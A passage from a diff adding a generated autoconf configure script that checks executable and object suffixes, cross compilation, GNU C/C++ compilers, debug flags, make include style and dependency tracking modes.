suffix of executables" >&5 +$as_echo_n "checking for suffix of executables... " >&6; } +if { { ac_try="$ac_link" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; then : + # If both `conftest.exe' and `conftest' are `present' (well, observable) +# catch `conftest.exe'. For instance with Cygwin, `ls conftest' will +# work properly (i.e., refer to `conftest.exe'), while it won't with +# `rm'. +for ac_file in conftest.exe conftest conftest.*; do + test -f "$ac_file" || continue + case $ac_file in + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; + *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` + break;; + * ) break;; + esac +done +else + { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "cannot compute suffix of executables: cannot compile and link +See \`config.log' for more details." "$LINENO" 5; } +fi +rm -f conftest conftest$ac_cv_exeext +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_exeext" >&5 +$as_echo "$ac_cv_exeext" >&6; } + +rm -f conftest.$ac_ext +EXEEXT=$ac_cv_exeext +ac_exeext=$EXEEXT +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@include +int +main () +{ +FILE *f = fopen ("conftest.out", "w"); + return ferror (f) || fclose (f) != 0; + + ; + return 0; +} +_ACEOF +ac_clean_files="$ac_clean_files conftest.out" +# Check that the compiler produces executables we can run. If not, either +# the compiler is broken, or we cross compile. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are cross compiling" >&5 +$as_echo_n "checking whether we are cross compiling... " >&6; } +if test "$cross_compiling" != yes; then + { { ac_try="$ac_link" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } + if { ac_try='./conftest$ac_cv_exeext' + { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; }; then + cross_compiling=no + else + if test "$cross_compiling" = maybe; then + cross_compiling=yes + else + { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "cannot run C++ compiled programs. +If you meant to cross compile, use \`--host'. +See \`config.log' for more details." "$LINENO" 5; } + fi + fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $cross_compiling" >&5 +$as_echo "$cross_compiling" >&6; } + +rm -f conftest.$ac_ext conftest$ac_cv_exeext conftest.out +ac_clean_files=$ac_clean_files_save +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for suffix of object files" >&5 +$as_echo_n "checking for suffix of object files... " >&6; } +if test "${ac_cv_objext+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +rm -f conftest.o conftest.obj +if { { ac_try="$ac_compile" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compile") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; then : + for ac_file in conftest.o conftest.obj conftest.*; do + test -f "$ac_file" || continue; + case $ac_file in + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;; + *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'` + break;; + esac +done +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +{ { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "cannot compute suffix of object files: cannot compile +See \`config.log' for more details." "$LINENO" 5; } +fi +rm -f conftest.$ac_cv_objext conftest.$ac_ext +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_objext" >&5 +$as_echo "$ac_cv_objext" >&6; } +OBJEXT=$ac_cv_objext +ac_objext=$OBJEXT +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are using the GNU C++ compiler" >&5 +$as_echo_n "checking whether we are using the GNU C++ compiler... " >&6; } +if test "${ac_cv_cxx_compiler_gnu+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ +#ifndef __GNUC__ + choke me +#endif + + ; + return 0; +} +_ACEOF +if ac_fn_cxx_try_compile "$LINENO"; then : + ac_compiler_gnu=yes +else + ac_compiler_gnu=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +ac_cv_cxx_compiler_gnu=$ac_compiler_gnu + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_cxx_compiler_gnu" >&5 +$as_echo "$ac_cv_cxx_compiler_gnu" >&6; } +if test $ac_compiler_gnu = yes; then + GXX=yes +else + GXX= +fi +ac_test_CXXFLAGS=${CXXFLAGS+set} +ac_save_CXXFLAGS=$CXXFLAGS +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CXX accepts -g" >&5 +$as_echo_n "checking whether $CXX accepts -g... " >&6; } +if test "${ac_cv_prog_cxx_g+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + ac_save_cxx_werror_flag=$ac_cxx_werror_flag + ac_cxx_werror_flag=yes + ac_cv_prog_cxx_g=no + CXXFLAGS="-g" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_cxx_try_compile "$LINENO"; then : + ac_cv_prog_cxx_g=yes +else + CXXFLAGS="" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_cxx_try_compile "$LINENO"; then : + +else + ac_cxx_werror_flag=$ac_save_cxx_werror_flag + CXXFLAGS="-g" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_cxx_try_compile "$LINENO"; then : + ac_cv_prog_cxx_g=yes +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext + ac_cxx_werror_flag=$ac_save_cxx_werror_flag +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cxx_g" >&5 +$as_echo "$ac_cv_prog_cxx_g" >&6; } +if test "$ac_test_CXXFLAGS" = set; then + CXXFLAGS=$ac_save_CXXFLAGS +elif test $ac_cv_prog_cxx_g = yes; then + if test "$GXX" = yes; then + CXXFLAGS="-g -O2" + else + CXXFLAGS="-g" + fi +else + if test "$GXX" = yes; then + CXXFLAGS="-O2" + else + CXXFLAGS= + fi +fi +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu +DEPDIR="${am__leading_dot}deps" + +ac_config_commands="$ac_config_commands depfiles" + + +am_make=${MAKE-make} +cat > confinc << 'END' +am__doit: + @echo this is the am__doit target +.PHONY: am__doit +END +# If we don't find an include directive, just comment out the code. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for style of include used by $am_make" >&5 +$as_echo_n "checking for style of include used by $am_make... " >&6; } +am__include="#" +am__quote= +_am_result=none +# First try GNU make style include. +echo "include confinc" > confmf +# Ignore all kinds of additional output from `make'. +case `$am_make -s -f confmf 2> /dev/null` in #( +*the\ am__doit\ target*) + am__include=include + am__quote= + _am_result=GNU + ;; +esac +# Now try BSD make style include. +if test "$am__include" = "#"; then + echo '.include "confinc"' > confmf + case `$am_make -s -f confmf 2> /dev/null` in #( + *the\ am__doit\ target*) + am__include=.include + am__quote="\"" + _am_result=BSD + ;; + esac +fi + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $_am_result" >&5 +$as_echo "$_am_result" >&6; } +rm -f confinc confmf + +@%:@ Check whether --enable-dependency-tracking was given. +if test "${enable_dependency_tracking+set}" = set; then : + enableval=$enable_dependency_tracking; +fi + +if test "x$enable_dependency_tracking" != xno; then + am_depcomp="$ac_aux_dir/depcomp" + AMDEPBACKSLASH='\' +fi + if test "x$enable_dependency_tracking" != xno; then + AMDEP_TRUE= + AMDEP_FALSE='#' +else + AMDEP_TRUE='#' + AMDEP_FALSE= +fi + + + +depcc="$CXX" am_compiler_list= + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking dependency style of $depcc" >&5 +$as_echo_n "checking dependency style of $depcc... " >&6; } +if test "${am_cv_CXX_dependencies_compiler_type+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -z "$AMDEP_TRUE" && test -f "$am_depcomp"; then + # We make a subdir and do the tests there. Otherwise we can end up + # making bogus files that we don't know about and never remove. For + # instance it was reported that on HP-UX the gcc test will end up + # making a dummy file named `D' -- because `-MD' means `put the output + # in D'. + mkdir conftest.dir + # Copy depcomp to subdir because otherwise we won't find it if we're + # using a relative directory. + cp "$am_depcomp" conftest.dir + cd conftest.dir + # We will build objects and dependencies in a subdirectory because + # it helps to detect inapplicable dependency modes. For instance + # both Tru64's cc and ICC support -MD to output dependencies as a + # side effect of compilation, but ICC will put the dependencies in + # the current directory while Tru64 will put them in the object + # directory. + mkdir sub + + am_cv_CXX_dependencies_compiler_type=none + if test "$am_compiler_list" = ""; then + am_compiler_list=`sed -n 's/^#*\([a-zA-Z0-9]*\))$/\1/p' < ./depcomp` + fi + am__universal=false + case " $depcc " in #( + *\ -arch\ *\ -arch\ *) am__universal=true ;; + esac + + for depmode in $am_compiler_list; do + # Setup a source with many dependencies, because some compilers + # like to wrap large dependency lists on column 80 (with \), and + # we should not choose a depcomp mode which is confused by this. + # + # We need to recreate these files for each test, as the compiler may + # overwrite some of them when testing with obscure command lines. + # This happens at least with the AIX C compiler. + : > sub/conftest.c + for i in 1 2 3 4 5 6; do + echo '#include "conftst'$i'.h"' >> sub/conftest.c + # Using `: > sub/conftst$i.h' creates only sub/conftst1.h with + # Solaris 8's {/usr,}/bin/sh. + touch sub/conftst$i.h + done + echo "${am__include} ${am__quote}sub/conftest.Po${am__quote}" > confmf + + # We check with `-c' and `-o' for the sake of the "dashmstdout" + # mode. It turns out that the SunPro C++ compiler does not properly + # handle `-M -o', and we need to detect this. Also, some Intel + # versions had trouble with output in subdirs + am__obj=sub/conftest.${OBJEXT-o} + am__minus_obj="-o $am__obj" + case $depmode in + gcc) + # This depmode causes a compiler race in universal mode. + test "$am__universal" = false || continue + ;; + nosideeffect) + # after this tag, mechanisms are not by side-effect, so they'll + # only be used when explicitly requested + if test "x$enable_dependency_tracking" = xyes; then + continue + else + break + fi + ;; + msvisualcpp | msvcmsys) + # This compiler won't grok `-c -o', but also, the minuso test has + # not run yet. These depmodes are late enough in the game, and + # so weak that their functioning should not be impacted. + am__obj=conftest.${OBJEXT-o} + am__minus_obj= + ;; + none) break ;; + esac + if depmode=$depmode \ + source=sub/conftest.c object=$am__obj \ + depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \ + $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \ + >/dev/null 2>conftest.err && + grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 && + grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 && + grep $am__obj sub/conftest.Po > /dev/null 2>&1 && + ${MAKE-make} -s -f confmf > /dev/null 2>&1; then + # icc doesn't choke on unknown options, it will just issue warnings + # or remarks (even with -Werror). So we grep stderr for any message + # that says an option was ignored or not supported. + # When given -MP, icc 7.0 and 7.1 complain thusly: + # icc: Command line warning: ignoring option '-M'; no argument required + # The diagnosis changed in icc 8.0: + # icc: Command line remark: option '-MP' not supported + if (grep 'ignoring option' conftest.err || + grep 'not supported' conftest.err) >/dev/null 2>&1; then :; else + am_cv_CXX_dependencies_compiler_type=$depmode + break + fi + fi + done + + cd .. + rm -rf conftest.dir +else + am_cv_CXX_dependencies_compiler_type=none +fi + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $am_cv_CXX_dependencies_compiler_type" >&5 +$as_echo "$am_cv_CXX_dependencies_compiler_type" >&6; } +CXXDEPMODE=depmode=$am_cv_CXX_dependencies_compiler_type + + if + test "x$enable_dependency_tracking" != xno \ + && test "$am_cv_CXX_dependencies_compiler_type" = gcc3; then + am__fastdepCXX_TRUE= + am__fastdepCXX_FALSE='#' +else + am__fastdepCXX_TRUE='#' + am__fastdepCXX_FALSE= +fi + + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu +if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}gcc", so it can be a program name with args. +set dummy ${ac_tool_prefix}gcc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_CC="${ac_tool_prefix}gcc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + +fi +if test -z "$ac_cv_prog_CC"; then + ac_ct_CC=$CC + # Extract the first word of "gcc", so it can be a program name with args. +set dummy gcc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_ac_ct_CC="gcc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CC" >&5 +$as_echo "$ac_ct_CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + if test "x$ac_ct_CC" = x; then + CC="" + else + case $cross_compiling:$ac_tool_warned in +yes:) +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} +ac_tool_warned=yes ;; +esac + CC=$ac_ct_CC + fi +else + CC="$ac_cv_prog_CC" +fi + +if test -z "$CC"; then + if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}cc", so it can be a program name with args. +set dummy ${ac_tool_prefix}cc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_CC="${ac_tool_prefix}cc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + fi +fi +if test -z "$CC"; then + # Extract the first word of "cc", so it can be a program name with args. +set dummy cc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else + ac_prog_rejected=no +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + if test "$as_dir/$ac_word$ac_exec_ext" = "/usr/ucb/cc"; then + ac_prog_rejected=yes + continue + fi + ac_cv_prog_CC="cc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +if test $ac_prog_rejected = yes; then + # We found a bogon in the path, so make sure we never use it. + set dummy $ac_cv_prog_CC + shift + if test $@%:@ != 0; then + # We chose a different compiler from the bogus one. + # However, it has the same basename, so the bogon will be chosen + # first if we set CC to just the basename; use the full file name. + shift + ac_cv_prog_CC="$as_dir/$ac_word${1+' '}$@" + fi +fi +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + +fi +if test -z "$CC"; then + if test -n "$ac_tool_prefix"; then + for ac_prog in cl.exe + do + # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. +set dummy $ac_tool_prefix$ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_CC="$ac_tool_prefix$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$CC" && break + done +fi +if test -z "$CC"; then + ac_ct_CC=$CC + for ac_prog in cl.exe +do + # Extract the first word of "$ac_prog", so it can be a program name with args. +set dummy $ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_ac_ct_CC="$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CC" >&5 +$as_echo "$ac_ct_CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$ac_ct_CC" && break +done + + if test "x$ac_ct_CC" = x; then + CC="" + else + case $cross_compiling:$ac_tool_warned in +yes:) +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} +ac_tool_warned=yes ;; +esac + CC=$ac_ct_CC + fi +fi + +fi + + +test -z "$CC" && { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "no acceptable C compiler found in \$PATH +See \`config.log' for more details." "$LINENO" 5; } + +# Provide some information about the compiler. +$as_echo "$as_me:${as_lineno-$LINENO}: checking for C compiler version" >&5 +set X $ac_compile +ac_compiler=$2 +for ac_option in --version -v -V -qversion; do + { { ac_try="$ac_compiler $ac_option >&5" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compiler $ac_option >&5") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + sed '10a\ +... rest of stderr output deleted ... + 10q' conftest.err >conftest.er1 + cat conftest.er1 >&5 + fi + rm -f conftest.er1 conftest.err + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } +done + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are using the GNU C compiler" >&5 +$as_echo_n "checking whether we are using the GNU C compiler... " >&6; } +if test "${ac_cv_c_compiler_gnu+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ +#ifndef __GNUC__ + choke me +#endif + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_compiler_gnu=yes +else + ac_compiler_gnu=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +ac_cv_c_compiler_gnu=$ac_compiler_gnu + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_c_compiler_gnu" >&5 +$as_echo "$ac_cv_c_compiler_gnu" >&6; } +if test $ac_compiler_gnu = yes; then + GCC=yes +else + GCC= +fi +ac_test_CFLAGS=${CFLAGS+set} +ac_save_CFLAGS=$CFLAGS +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CC accepts -g" >&5 +$as_echo_n "checking whether $CC accepts -g... " >&6; } +if test "${ac_cv_prog_cc_g+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + ac_save_c_werror_flag=$ac_c_werror_flag + ac_c_werror_flag=yes + ac_cv_prog_cc_g=no + CFLAGS="-g" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_prog_cc_g=yes +else + CFLAGS="" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + +else + ac_c_werror_flag=$ac_save_c_werror_flag + CFLAGS="-g" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_prog_cc_g=yes +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext + ac_c_werror_flag=$ac_save_c_werror_flag +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_g" >&5 +$as_echo "$ac_cv_prog_cc_g" >&6; } +if test "$ac_test_CFLAGS" = set; then + CFLAGS=$ac_save_CFLAGS +elif test $ac_cv_prog_cc_g = yes; then + if test "$GCC" = yes; then + CFLAGS="-g -O2" + else + CFLAGS="-g" + fi +else + if test "$GCC" = yes; then + CFLAGS="-O2" + else + CFLAGS= + fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $CC option to accept ISO C89" >&5 +$as_echo_n "checking for $CC option to accept ISO C89... " >&6; } +if test "${ac_cv_prog_cc_c89+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + ac_cv_prog_cc_c89=no +ac_save_CC=$CC +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include +#include +#include +#include +/* Most of the following tests are stolen from RCS 5.7's src/conf.sh. */ +struct buf { int x; }; +FILE * (*rcsopen) (struct buf *, struct stat *, int); +static char *e (p, i) + char **p; + int i; +{ + return p[i]; +} +static char *f (char * (*g) (char **, int), char **p, ...) +{ + char *s; + va_list v; + va_start (v,p); + s = g (p, va_arg (v,int)); + va_end (v); + return s; +} + +/* OSF 4.0 Compaq cc is some sort of almost-ANSI by default. It has + function prototypes and stuff, but not '\xHH' hex character constants. + These don't provoke an error unfortunately, instead are silently treated + as 'x'. The following induces an error, until -std is added to get + proper ANSI mode. Curiously '\x00'!='x' always comes out true, for an + array size at least. It's necessary to write '\x00'==0 to get something + that's true only with -std. */ +int osf4_cc_array ['\x00' == 0 ? 1 : -1]; + +/* IBM C 6 for AIX is almost-ANSI by default, but it replaces macro parameters + inside strings and character constants. */ +#define FOO(x) 'x' +int xlc6_cc_array[FOO(a) == 'x' ? 1 : -1]; + +int test (int i, double x); +struct s1 {int (*f) (int a);}; +struct s2 {int (*f) (double a);}; +int pairnames (int, char **, FILE *(*)(struct buf *, struct stat *, int), int, int); +int argc; +char **argv; +int +main () +{ +return f (e, argv, 0) != argv[0] || f (e, argv, 1) != argv[1]; + ; + return 0; +} +_ACEOF +for ac_arg in '' -qlanglvl=extc89 -qlanglvl=ansi -std \ + -Ae "-Aa -D_HPUX_SOURCE" "-Xc -D__EXTENSIONS__" +do + CC="$ac_save_CC $ac_arg" + if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_prog_cc_c89=$ac_arg +fi +rm -f core conftest.err conftest.$ac_objext + test "x$ac_cv_prog_cc_c89" != "xno" && break +done +rm -f conftest.$ac_ext +CC=$ac_save_CC + +fi +# 